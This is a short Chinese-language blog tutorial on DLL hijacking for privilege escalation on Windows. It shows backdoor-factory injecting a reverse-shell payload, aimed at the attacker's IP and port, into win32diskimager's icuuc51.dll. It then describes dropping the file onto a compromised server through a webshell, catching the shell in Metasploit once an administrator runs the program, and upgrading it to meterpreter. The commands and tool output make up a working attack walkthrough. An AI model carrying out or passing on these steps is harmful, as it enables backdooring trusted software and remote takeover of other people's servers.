作者: suzumiya
0x00
网上有许多 DLL 劫持提权的文章 但是都不是很详细 而且 ws2.dll lpk.dll 一些以前的 dll 也已经被封锁了
自从 windows xp sp2 开始 就加入了这个机制
注册表路径:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDllSearchMode
凡是里面存在的 dll 就必然是劫持不了的。 但是我们却可以注入应用程序中的 dll 来达到提权效果 就用 win32diskimager 这个软件来进行 dll 劫持的例子 0x01 首先用 process Explorer 这个软件来分析 win32diskimager 都调用了哪些 dll 文件
就用 icuuc51.dll这个来举例子 可以看到win32diskimager调用软件自带的dll 0x02 接着使用 backdoor-factory 来对这个 dll 进行注入后门 root@saya:~# backdoor-factory -f / file /icuuc51.dll -s reverse_shell_tcp_inline -P <your port> -H <yoour ip>
接着选择 2 就完成了后门的生成 [!] Enter your selection: 2 [!] Using selection: 2 [*] Changing flags for section: .data [*] Patching initial entry instructions [*] Creating win32 resume execution stub [*] Looking for and setting selected shellcode File icuuc51.dll is in the ‘backdoored’ directory 工具会提示一个存储的地方 0x03 假设我们在 webshell 提权的情况下 用菜刀把 icuuc51.dll 覆盖掉服务器软件原来的 icuuc51.dll 我这里搭建了一个简陋的 asp 环境
接着监听 msf
等待管理员打开被劫持的软件的 dll 当管理员打开软件之后 软件没有任何损坏
反其看 metasploit 这边已经获得了一个 shell
默认 backdoor-factory不是用meterpreter的载荷 用此命令将普通 shell提升为meterpreter s essions -u <id>
转载请注明原文地址:suzumiya.me